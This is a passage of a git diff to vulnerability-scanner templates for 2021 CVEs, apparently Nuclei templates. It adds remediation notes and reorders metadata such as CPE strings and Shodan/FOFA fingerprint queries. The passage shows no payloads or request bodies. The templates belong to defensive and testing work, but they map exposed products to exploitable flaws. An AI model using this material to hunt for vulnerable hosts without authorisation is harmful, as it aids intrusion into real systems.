b/http/cves/2021/CVE-2021-29505.yaml index 6013202ad2..b6af5b8aab 100644 --- a/http/cves/2021/CVE-2021-29505.yaml +++ b/http/cves/2021/CVE-2021-29505.yaml @@ -6,21 +6,21 @@ info: severity: high description: | XStream before 1.4.17 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Patched in 1.4.17. reference: - https://paper.seebug.org/1543/ - https://github.com/vulhub/vulhub/blob/master/xstream/CVE-2021-29505/README.zh-cn.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29505 - https://github.com/x-stream/xstream/security/advisories/GHSA-7chv-rrw6-w6fc - https://nvd.nist.gov/vuln/detail/cve-2021-29505 - remediation: Patched in 1.4.17. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-29505 cwe-id: CWE-502 epss-score: 0.02373 - cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* epss-percentile: 0.88448 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index f20a058c91..e096903fee 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -5,20 +5,20 @@ info: author: geeknik severity: medium description: Prometheus 2.23.0 through 2.26.0 and 2.27.0 contains an open redirect vulnerability. To ensure a seamless transition to 2.27.0, the default UI was changed to the new UI with a URL prefixed by /new redirect to /. Due to a bug in the code, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: The issue was patched in the 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. The workaround is to disable access to /new via a reverse proxy in front of Prometheus. reference: - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 - https://github.com/prometheus/prometheus/releases/tag/v2.26.1 - https://github.com/prometheus/prometheus/releases/tag/v2.27.1 - https://nvd.nist.gov/vuln/detail/CVE-2021-29622 - remediation: The issue was patched in the 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. The workaround is to disable access to /new via a reverse proxy in front of Prometheus. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-29622 cwe-id: CWE-601 epss-score: 0.00225 - cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:* epss-percentile: 0.60091 + cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: prometheus diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 7e629c1fc7..9d29bca843 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: Adminer 4.6.1 to 4.8.0 contains a cross-site scripting vulnerability which affects users of MySQL, MariaDB, PgSQL, and SQLite in browsers without CSP when Adminer uses a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). + remediation: This vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`). reference: - https://sourceforge.net/p/adminer/bugs-and-features/797/ - https://github.com/vrana/adminer/commit/4043092ec2c0de2258d60a99d0c5958637d051a7 - https://nvd.nist.gov/vuln/detail/CVE-2021-29625 - https://github.com/vrana/adminer/security/advisories/GHSA-2v82-5746-vwqc - remediation: This vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`). classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-29625 cwe-id: CWE-79 epss-score: 0.00212 - cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* epss-percentile: 0.58458 + cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: adminer diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 0d12e71690..23a0794799 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter. + remediation: | + Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor. reference: - http://www.cinquino.eu/SeoPanelReflect.htm - https://github.com/seopanel/Seo-Panel/issues/202 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-3002 cwe-id: CWE-79 epss-score: 0.00135 - cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* epss-percentile: 0.47974 + cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: "seopanel" diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index a4773ca8a4..728d92892d 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: SysAid 20.3.64 b14 contains a cross-site scripting vulnerability via the /KeepAlive.jsp?stamp= URI. + remediation: | + Apply the latest patch or upgrade to a non-vulnerable version of SysAid Technologies 20.3.64 b14 to mitigate the XSS vulnerability. reference: - https://eh337.net/2021/03/30/sysaid/ - https://nvd.nist.gov/vuln/detail/CVE-2021-30049 @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-30049 cwe-id: CWE-79 epss-score: 0.00102 - cpe: cpe:2.3:a:sysaid:sysaid:20.3.64:b14:*:*:*:*:*:* epss-percentile: 0.40864 + cpe: cpe:2.3:a:sysaid:sysaid:20.3.64:b14:*:*:*:*:*:* metadata: max-request: 1 vendor: sysaid diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index 71b7330908..db9b142c38 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -5,6 +5,8 @@ info: author: For3stCo1d severity: critical description: Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions. + remediation: | + Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability. reference: - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-30128 cwe-id: CWE-502 epss-score: 0.18312 - cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* epss-percentile: 0.95512 + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="Apache_OFBiz" verified: true + max-request: 1 vendor: apache product: ofbiz + fofa-query: app="Apache_OFBiz" tags: cve,cve2021,apache,ofbiz,deserialization,rce http: diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml index f731e55e9b..871c1ec18c 100644 --- a/http/cves/2021/CVE-2021-30134.yaml +++ b/http/cves/2021/CVE-2021-30134.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Php-mod/curl library before 2.3.2 contains a cross-site scripting vulnerability via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. An attacker can inject arbitrary script, which can allow theft of cookie-based authentication credentials and launch of other attacks. + remediation: | + Upgrade to Php-mod/curl Library version 2.3.2 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/0b547728-27d2-402e-ae17-90d539344ec7 - https://nvd.nist.gov/vuln/detail/CVE-2021-30134 @@ -15,14 +17,14 @@ info: cve-id: CVE-2021-30134 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:* epss-percentile: 0.29012 + cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:* metadata: - max-request: 1 - google-query: inurl:"/php-curl-test/post_file_path_upload.php" verified: true + max-request: 1 vendor: php_curl_class_project product: php_curl_class + google-query: inurl:"/php-curl-test/post_file_path_upload.php" tags: cve,cve2021,xss,php-mod,wpscan http: diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index d50aff8b47..33f8fb0c06 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDk severity: medium description: Sidekiq through 5.1.3 and 6.x through 6.2.0 contains a cross-site scripting vulnerability via the queue name of the live-poll feature when Internet Explorer is used. + remediation: | + Upgrade to Sidekiq version 6.2.0 or later to mitigate this vulnerability. reference: - https://github.com/mperham/sidekiq/issues/4852 - https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-30151 cwe-id: CWE-79 epss-score: 0.00435 - cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* epss-percentile: 0.71462 + cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: contribsys diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml index ccf6a4bc50..d2d6df41dc 100644 --- a/http/cves/2021/CVE-2021-3017.yaml +++ b/http/cves/2021/CVE-2021-3017.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code. + remediation: | + Update the router firmware to the latest version, which includes a fix for the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3017 - https://pastebin.com/cTYTf0Yn @@ -13,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-3017 epss-score: 0.0151 - cpe: cpe:2.3:o:intelbras:win_300_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.85325 + cpe: cpe:2.3:o:intelbras:win_300_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelbras diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index acbcb8e0db..06aabc0b86 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ZEROF Web Server 1.0 (April 2021) allows SQL Injection via the /HandleEvent endpoint for the login page. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in ZEROF Web Server 1.0. reference: - https://github.com/awillix/research/blob/main/cve/CVE-2021-30175.md - https://nvd.nist.gov/vuln/detail/CVE-2021-30175 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-30175 cwe-id: CWE-89 epss-score: 0.03345 - cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:* epss-percentile: 0.9012 + cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zerof diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index 9221ef6bb4..a62c6f39a9 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet. + remediation: | + Apply the latest patch or upgrade to a version that has fixed the vulnerability. reference: - https://github.com/ffay/lanproxy/commits/master - https://github.com/maybe-why-not/lanproxy/issues/1 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-3019 cwe-id: CWE-22 epss-score: 0.01151 - cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:* epss-percentile: 0.83025 + cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: lanproxy_project diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml index 61b3823c5b..1ddff837ee 100644 --- a/http/cves/2021/CVE-2021-30213.yaml +++ b/http/cves/2021/CVE-2021-30213.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: medium description: Knowage Suite 7.3 contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in Knowage Suite 7.3. reference: - https://github.com/piuppi/Proof-of-Concepts/blob/main/Engineering/XSS-KnowageSuite7-3_unauth.md - https://nvd.nist.gov/vuln/detail/CVE-2021-30213 @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-30213 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:eng:knowage:7.3.0:*:*:*:*:*:*:* epss-percentile: 0.40466 + cpe: cpe:2.3:a:eng:knowage:7.3.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: eng diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index bb8f18d7e3..09fa5f6e6b 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VoipMonitor prior to 24.61 is susceptible to remote code execution vulnerabilities because of its use of user supplied data via its web interface, allowing remote unauthenticated users to trigger a remote PHP code execution vulnerability. + remediation: | + Upgrade VoipMonitor to version 24.61 or later to mitigate this vulnerability. reference: - https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ - https://nvd.nist.gov/vuln/detail/CVE-2021-30461 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-30461 cwe-id: CWE-94 epss-score: 0.96767 - cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* epss-percentile: 0.99521 + cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"VoIPmonitor" vendor: voipmonitor product: voipmonitor + shodan-query: http.title:"VoIPmonitor" tags: cve,cve2021,rce,voipmonitor http: diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index 8f0c78626a..7ebab45652 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Ivanti Avalanche 6.3.2 is vulnerable to local file inclusion because it allows remote unauthenticated user to access files that reside outside the 'image' folder. + remediation: | + Apply the latest security patches or updates provided by Ivanti to fix the LFI vulnerability in Avalanche 6.3.2. reference: - https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/ - https://forums.ivanti.com/s/article/Security-Alert-CVE-2021-30497-Directory-Traversal-Vulnerability?language=en_US @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-30497 cwe-id: CWE-22 epss-score: 0.96366 - cpe: cpe:2.3:a:ivanti:avalanche:6.3.2:*:*:*:*:windows:*:* epss-percentile: 0.99355 + cpe: cpe:2.3:a:ivanti:avalanche:6.3.2:*:*:*:*:windows:*:* metadata: max-request: 1 - framework: windows vendor: ivanti product: avalanche + framework: windows tags: cve,cve2021,avalanche,traversal,lfi http: diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index 15ea343ebc..b939fd561e 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of PrestaShop. reference: - https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e - https://www.exploit-db.com/exploits/49410 @@ -16,11 +18,11 @@ info: cve-id: CVE-2021-3110 cwe-id: CWE-89 epss-score: 0.95398 - cpe: cpe:2.3:a:prestashop:prestashop:1.7.7.0:*:*:*:*:*:*:* epss-percentile: 0.99094 + cpe: cpe:2.3:a:prestashop:prestashop:1.7.7.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: prestashop product: prestashop tags: cve,cve2021,sqli,prestshop,edb diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index d5ae4e0b82..705b5f5110 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml @@ -5,6 +5,8 @@ info: author: infosecsanyam severity: medium description: Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp. + remediation: | + Apply the latest security updates provided by Microsoft to mitigate this vulnerability. reference: - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-31195 cwe-id: CWE-79 epss-score: 0.94276 - cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* epss-percentile: 0.98858 + cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"Outlook" vendor: microsoft product: exchange_server + shodan-query: http.title:"Outlook" tags: microsoft,exchange,owa,xss http: diff --git a/http/cves/2021/CVE-2021-31249.yaml b/http/cves/2021/CVE-2021-31249.yaml index 0040436a43..a185a0d543 100644 --- a/http/cves/2021/CVE-2021-31249.yaml +++ b/http/cves/2021/CVE-2021-31249.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the vulnerability. reference: - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 - https://www.chiyu-tech.com/msg/message-Firmware-update-87.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-31249 cwe-id: CWE-74 epss-score: 0.00331 - cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.67395 + cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: chiyu-tech diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml index 702e6dc450..8621e74c23 100644 --- a/http/cves/2021/CVE-2021-31250.yaml +++ b/http/cves/2021/CVE-2021-31250.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi. + remediation: | + To mitigate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being rendered in web pages. reference: - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250 - https://www.chiyu-tech.com/msg/message-Firmware-update-87.htm @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-31250 cwe-id: CWE-79 epss-score: 0.97079 - cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.99662 + cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: chiyu-tech diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml index 76857ad1ad..1020a981b1 100644 --- a/http/cves/2021/CVE-2021-3129.yaml +++ b/http/cves/2021/CVE-2021-3129.yaml @@ -5,6 +5,8 @@ info: author: z3bd,pdteam severity: critical description: Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. + remediation: | + Upgrade Laravel to version 8.4.3 or higher to mitigate this vulnerability. reference: - https://www.ambionics.io/blog/laravel-debug-rce - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129 @@ -15,13 +17,13 @@ info: cvss-score: 9.8 cve-id: CVE-2021-3129 epss-score: 0.97515 - cpe: cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:* epss-percentile: 0.99973 + cpe: cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:* metadata: max-request: 6 - framework: laravel vendor: facade product: ignition + framework: laravel tags: cve,cve2021,laravel,rce,vulhub http: diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml index 2e44115220..39167defda 100644 --- a/http/cves/2021/CVE-2021-31537.yaml +++ b/http/cves/2021/CVE-2021-31537.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: SIS Informatik REWE GO SP17 before 7.7 contains a cross-site scripting vulnerability via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). + remediation: | + To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being displayed on web pages. reference: - https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ - http://seclists.org/fulldisclosure/2021/May/20 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-31537 cwe-id: CWE-79 epss-score: 0.00271 - cpe: cpe:2.3:a:sisinformatik:sis-rewe_go:*:*:*:*:*:*:*:* epss-percentile: 0.63726 + cpe: cpe:2.3:a:sisinformatik:sis-rewe_go:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sisinformatik diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index b5ec1abb7b..94db35e917 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -5,19 +5,19 @@ info: author: geeknik severity: medium description: Akkadian Provisioning Manager is susceptible to information disclosure. The restricted shell provided can be escaped by abusing the Edit MySQL Configuration command. This command launches a standard VI editor interface which can then be escaped. + remediation: This issue was resolved in Akkadian OVA appliance version 3.0 and later, Akkadian Provisioning Manager 5.0.2 and later, and Akkadian Appliance Manager 3.3.0.314-4a349e0 and later. reference: - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/ - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ - https://nvd.nist.gov/vuln/detail/CVE-2021-31581 - remediation: This issue was resolved in Akkadian OVA appliance version 3.0 and later, Akkadian Provisioning Manager 5.0.2 and later, and Akkadian Appliance Manager 3.3.0.314-4a349e0 and later. classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.4 cve-id: CVE-2021-31581 cwe-id: CWE-269,CWE-312 epss-score: 0.00285 - cpe: cpe:2.3:a:akkadianlabs:ova_appliance:*:*:*:*:*:*:*:* epss-percentile: 0.64676 + cpe: cpe:2.3:a:akkadianlabs:ova_appliance:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: akkadianlabs diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index 6c6c132874..b3062892fd 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -5,6 +5,8 @@ info: author: Ahmed Abou-Ela severity: medium description: BeyondTrust Secure Remote Access Base through 6.0.1 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML. + remediation: | + Upgrade to a patched version of BeyondTrust Secure Remote Access Base (6.0.2 or higher) that addresses the XSS vulnerability. reference: - https://packetstormsecurity.com/files/165408 - https://cxsecurity.com/issue/WLB-2022010013 @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-31589 cwe-id: CWE-79 epss-score: 0.00287 - cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:* epss-percentile: 0.64804 + cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: '"BeyondTrust" "Redistribution Prohibited"' - shodan-query: 'set-cookie: nsbase_session' vendor: beyondtrust product: appliance_base_software + shodan-query: 'set-cookie: nsbase_session' + google-query: '"BeyondTrust" "Redistribution Prohibited"' tags: xss,packetstorm,cve,cve2021,beyondtrust,bomgar http: diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index b66d075deb..40e1768bb3 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x severity: high description: Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x are vulnerable to authentication bypass. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials. + remediation: | + Apply the latest security patches or updates provided by Hitachi Vantara to fix the authentication bypass vulnerability. reference: - https://seclists.org/fulldisclosure/2021/Nov/13 - https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-31602 cwe-id: CWE-287 epss-score: 0.39689 - cpe: cpe:2.3:a:hitachi:vantara_pentaho:*:*:*:*:*:*:*:* epss-percentile: 0.96761 + cpe: cpe:2.3:a:hitachi:vantara_pentaho:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: Pentaho vendor: hitachi product: vantara_pentaho + shodan-query: Pentaho tags: spring,seclists,cve,cve2021,pentaho,auth-bypass http: diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index 6c057f5609..595c3397a6 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -5,6 +5,8 @@ info: author: gy741,dhiyaneshDk severity: medium description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter. + remediation: | + Upgrade to a patched version of WebCTRL OEM that addresses the XSS vulnerability (CVE-2021-31682). reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-31682 - https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-31682 cwe-id: CWE-79 epss-score: 0.00265 - cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:* epss-percentile: 0.63395 + cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: html:"/_common/lvl5/dologin.jsp" vendor: automatedlogic product: webctrl + shodan-query: html:"/_common/lvl5/dologin.jsp" tags: cve,cve2021,webctrl,xss,packetstorm http: diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml index 5f9886eaa9..93af507b9d 100644 --- a/http/cves/2021/CVE-2021-31755.yaml +++ b/http/cves/2021/CVE-2021-31755.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + remediation: | + Apply the latest firmware update provided by Tenda to fix the remote command injection vulnerability (CVE-2021-31755). reference: - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-31755 cwe-id: CWE-787 epss-score: 0.96795 - cpe: cpe:2.3:o:tenda:ac11_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99535 + cpe: cpe:2.3:o:tenda:ac11_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tenda diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index 7f6c01f134..704bb29590 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -5,21 +5,21 @@ info: author: taielab severity: critical description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued 